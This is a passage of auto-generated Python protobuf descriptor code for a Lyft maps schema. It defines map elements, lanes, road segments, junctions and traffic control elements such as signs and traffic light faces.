extension_ranges=[],
oneofs=[
],
serialized_start=11447,
serialized_end=11740,
)
_ANNOTATEDSHAPE_REGION = _descriptor.Descriptor(
name='Region',
full_name='pb.lyft.maps.AnnotatedShape.Region',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='pb.lyft.maps.AnnotatedShape.Region.source', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11742,
serialized_end=11766,
)
_ANNOTATEDSHAPE = _descriptor.Descriptor(
name='AnnotatedShape',
full_name='pb.lyft.maps.AnnotatedShape',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='pb.lyft.maps.AnnotatedShape.name', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='multipolygon', full_name='pb.lyft.maps.AnnotatedShape.multipolygon', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='building', full_name='pb.lyft.maps.AnnotatedShape.building', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='region', full_name='pb.lyft.maps.AnnotatedShape.region', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='venue', full_name='pb.lyft.maps.AnnotatedShape.venue', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='administrative_boundary', full_name='pb.lyft.maps.AnnotatedShape.administrative_boundary', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='park', full_name='pb.lyft.maps.AnnotatedShape.park', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='drivable_surface_prior', full_name='pb.lyft.maps.AnnotatedShape.drivable_surface_prior', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ANNOTATEDSHAPE_BUILDING, _ANNOTATEDSHAPE_REGION, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Type', full_name='pb.lyft.maps.AnnotatedShape.Type',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=11021,
serialized_end=11774,
)
_LATLNGBOX = _descriptor.Descriptor(
name='LatLngBox',
full_name='pb.lyft.maps.LatLngBox',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='south_west', full_name='pb.lyft.maps.LatLngBox.south_west', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='north_east', full_name='pb.lyft.maps.LatLngBox.north_east', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11776,
serialized_end=11881,
)
_MAPELEMENT_ELEMENT = _descriptor.Descriptor(
name='Element',
full_name='pb.lyft.maps.MapElement.Element',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='segment', full_name='pb.lyft.maps.MapElement.Element.segment', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='node', full_name='pb.lyft.maps.MapElement.Element.node', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lane', full_name='pb.lyft.maps.MapElement.Element.lane', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traffic_control_element', full_name='pb.lyft.maps.MapElement.Element.traffic_control_element', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='junction', full_name='pb.lyft.maps.MapElement.Element.junction', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='segment_sequence', full_name='pb.lyft.maps.MapElement.Element.segment_sequence', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='annotated_shape', full_name='pb.lyft.maps.MapElement.Element.annotated_shape', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='element', full_name='pb.lyft.maps.MapElement.Element.element',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=12196,
serialized_end=12584,
)
_MAPELEMENT_ASSOCIATEDCONDITIONS = _descriptor.Descriptor(
name='AssociatedConditions',
full_name='pb.lyft.maps.MapElement.AssociatedConditions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='conditions', full_name='pb.lyft.maps.MapElement.AssociatedConditions.conditions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='overrides', full_name='pb.lyft.maps.MapElement.AssociatedConditions.overrides', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12586,
serialized_end=12706,
)
_MAPELEMENT_DEBUGINFOENTRY = _descriptor.Descriptor(
name='DebugInfoEntry',
full_name='pb.lyft.maps.MapElement.DebugInfoEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='pb.lyft.maps.MapElement.DebugInfoEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='pb.lyft.maps.MapElement.DebugInfoEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12708,
serialized_end=12756,
)
_MAPELEMENT = _descriptor.Descriptor(
name='MapElement',
full_name='pb.lyft.maps.MapElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pb.lyft.maps.MapElement.id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='element', full_name='pb.lyft.maps.MapElement.element', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bounding_box', full_name='pb.lyft.maps.MapElement.bounding_box', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='associated_conditions', full_name='pb.lyft.maps.MapElement.associated_conditions', index=3,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='debug_info', full_name='pb.lyft.maps.MapElement.debug_info', index=4,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='service_region', full_name='pb.lyft.maps.MapElement.service_region', index=5,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_MAPELEMENT_ELEMENT, _MAPELEMENT_ASSOCIATEDCONDITIONS, _MAPELEMENT_DEBUGINFOENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11884,
serialized_end=12756,
)
_MAPFRAGMENT = _descriptor.Descriptor(
name='MapFragment',
full_name='pb.lyft.maps.MapFragment',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='pb.lyft.maps.MapFragment.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='elements', full_name='pb.lyft.maps.MapFragment.elements', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12758,
serialized_end=12829,
)
_GEOLOCATION.oneofs_by_name['Altitude'].fields.append(
_GEOLOCATION.fields_by_name['altitude_cm'])
_GEOLOCATION.fields_by_name['altitude_cm'].containing_oneof = _GEOLOCATION.oneofs_by_name['Altitude']
_GEOFRAME.fields_by_name['origin'].message_type = _GEOLOCATION
_ROADNETWORKNODE.fields_by_name['location'].message_type = _GEOLOCATION
_ROADNETWORKNODE.fields_by_name['road_segments'].message_type = _GLOBALID
_ROADNETWORKNODE.fields_by_name['junction'].message_type = _GLOBALID
_ACCESSRESTRICTION.fields_by_name['type'].enum_type = _ACCESSRESTRICTION_TYPE
_ACCESSRESTRICTION_TYPE.containing_type = _ACCESSRESTRICTION
_DAILYTIMEINTERVAL.fields_by_name['day_of_the_week'].enum_type = _DAILYTIMEINTERVAL_DAYOFTHEWEEK
_DAILYTIMEINTERVAL_DAYOFTHEWEEK.containing_type = _DAILYTIMEINTERVAL
_SCHEDULE.fields_by_name['daily_schedule'].message_type = _DAILYTIMEINTERVAL
_CONDITION.fields_by_name['daily_temporal_condition'].message_type = _DAILYTIMEINTERVAL
_CONDITION.oneofs_by_name['condition'].fields.append(
_CONDITION.fields_by_name['daily_temporal_condition'])
_CONDITION.fields_by_name['daily_temporal_condition'].containing_oneof = _CONDITION.oneofs_by_name['condition']
_ROADNETWORKSEGMENT_LANESET.fields_by_name['bike_lane_access'].enum_type = _ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS
_ROADNETWORKSEGMENT_LANESET.containing_type = _ROADNETWORKSEGMENT
_ROADNETWORKSEGMENT_LANESET_BIKELANEACCESS.containing_type = _ROADNETWORKSEGMENT_LANESET
_ROADNETWORKSEGMENT.fields_by_name['vertices'].message_type = _GEOLOCATION
_ROADNETWORKSEGMENT.fields_by_name['start_node'].message_type = _GLOBALID
_ROADNETWORKSEGMENT.fields_by_name['end_node'].message_type = _GLOBALID
_ROADNETWORKSEGMENT.fields_by_name['forward_lane_set'].message_type = _ROADNETWORKSEGMENT_LANESET
_ROADNETWORKSEGMENT.fields_by_name['backward_lane_set'].message_type = _ROADNETWORKSEGMENT_LANESET
_ROADNETWORKSEGMENT.fields_by_name['lanes'].message_type = _GLOBALID
_ROADNETWORKSEGMENT.fields_by_name['name'].message_type = _LOCALIZEDSTRING
_ROADNETWORKSEGMENT.fields_by_name['road_class'].enum_type = _ROADNETWORKSEGMENT_ROADCLASS
_ROADNETWORKSEGMENT.fields_by_name['travel_direction'].enum_type = _ROADNETWORKSEGMENT_TRAVELDIRECTION
_ROADNETWORKSEGMENT.fields_by_name['restrictions'].message_type = _GLOBALID
_ROADNETWORKSEGMENT.fields_by_name['walkable'].enum_type = _ROADNETWORKSEGMENT_SIDEOFSEGMENT
_ROADNETWORKSEGMENT.fields_by_name['forward_bikeable'].enum_type = _ROADNETWORKSEGMENT_BIKEACCESS
_ROADNETWORKSEGMENT.fields_by_name['backward_bikeable'].enum_type = _ROADNETWORKSEGMENT_BIKEACCESS
_ROADNETWORKSEGMENT_ROADCLASS.containing_type = _ROADNETWORKSEGMENT
_ROADNETWORKSEGMENT_TRAVELDIRECTION.containing_type = _ROADNETWORKSEGMENT
_ROADNETWORKSEGMENT_SIDEOFSEGMENT.containing_type = _ROADNETWORKSEGMENT
_ROADNETWORKSEGMENT_BIKEACCESS.containing_type = _ROADNETWORKSEGMENT
_JUNCTION.fields_by_name['road_network_nodes'].message_type = _GLOBALID
_JUNCTION.fields_by_name['lanes'].message_type = _GLOBALID
_JUNCTION.fields_by_name['traffic_control_elements'].message_type = _GLOBALID
_LANE_BOUNDARY.fields_by_name['divider_type'].enum_type = _LANE_BOUNDARY_DIVIDERTYPE
_LANE_BOUNDARY.containing_type = _LANE
_LANE_BOUNDARY_DIVIDERTYPE.containing_type = _LANE_BOUNDARY
_LANE.fields_by_name['parent_segment_or_junction'].message_type = _GLOBALID
_LANE.fields_by_name['access_restriction'].message_type = _ACCESSRESTRICTION
_LANE.fields_by_name['orientation_in_parent_segment'].enum_type = _ROADNETWORKSEGMENT_TRAVELDIRECTION
_LANE.fields_by_name['turn_type_in_parent_junction'].enum_type = _LANE_TURNTYPE
_LANE.fields_by_name['geo_frame'].message_type = _GEOFRAME
_LANE.fields_by_name['left_boundary'].message_type = _LANE_BOUNDARY
_LANE.fields_by_name['right_boundary'].message_type = _LANE_BOUNDARY
_LANE.fields_by_name['lanes_ahead'].message_type = _GLOBALID
_LANE.fields_by_name['adjacent_lane_change_left'].message_type = _GLOBALID
_LANE.fields_by_name['adjacent_lane_change_right'].message_type = _GLOBALID
_LANE.fields_by_name['traffic_controls'].message_type = _GLOBALID
_LANE.fields_by_name['yield_to_lanes'].message_type = _GLOBALID
_LANE.fields_by_name['tolls'].message_type = _GLOBALID
_LANE_TURNTYPE.containing_type = _LANE
_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK.fields_by_name['traffic_lights'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK.fields_by_name['yield_lines'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT_AUXILIARYELEMENT.fields_by_name['primary_traffic_control_elements'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_AUXILIARYELEMENT.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET.fields_by_name['lane'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET.fields_by_name['yield_to_lanes'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET.fields_by_name['yield_to_crosswalks'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET.containing_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE.fields_by_name['yield_rules_when_on'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET
_TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT_TRAFFICLIGHT.fields_by_name['face_states'].message_type = _GLOBALID
_TRAFFICCONTROLELEMENT_TRAFFICLIGHT.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT.fields_by_name['stop_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['yield_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['stop_line'].message_type = _TRAFFICCONTROLELEMENT_AUXILIARYELEMENT
_TRAFFICCONTROLELEMENT.fields_by_name['traffic_light'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHT
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_yellow'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_red'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_red_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_yellow_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_green_face'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_u_turn'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_u_turn'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_u_turn'].message_type = _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['speed_hump'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crosswalk'].message_type = _TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK
_TRAFFICCONTROLELEMENT.fields_by_name['keep_clear_zone'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crossing_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['signal_ahead_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_yield_on_green_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_parking_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['one_way_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['school_zone_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['parking_zone'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['stop_here_for_pedestrians_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_stop_for_pedestrian_in_crosswalk_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['yield_here_for_pedestrians_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['turning_vehicles_yield_to_pedestrians_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_yield_for_pedestrian_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_regulatory_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_warning_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_other_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_circulation_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_directional_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_other_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_on_red_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_on_red_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_turn_on_red_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['do_not_enter_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_u_turn_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_and_u_turn_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['no_straight_through_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_only_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['right_turn_only_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['u_turn_only_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['straight_through_only_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['other_turn_restriction_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone_sign'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_TRAFFICCONTROLELEMENT.fields_by_name['geo_frame'].message_type = _GEOFRAME
_TRAFFICCONTROLELEMENT.fields_by_name['geometry_type'].enum_type = _TRAFFICCONTROLELEMENT_GEOMETRYTYPE
_TRAFFICCONTROLELEMENT.fields_by_name['controlled_paths'].message_type = _LANESEQUENCE
_TRAFFICCONTROLELEMENT_GEOMETRYTYPE.containing_type = _TRAFFICCONTROLELEMENT
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
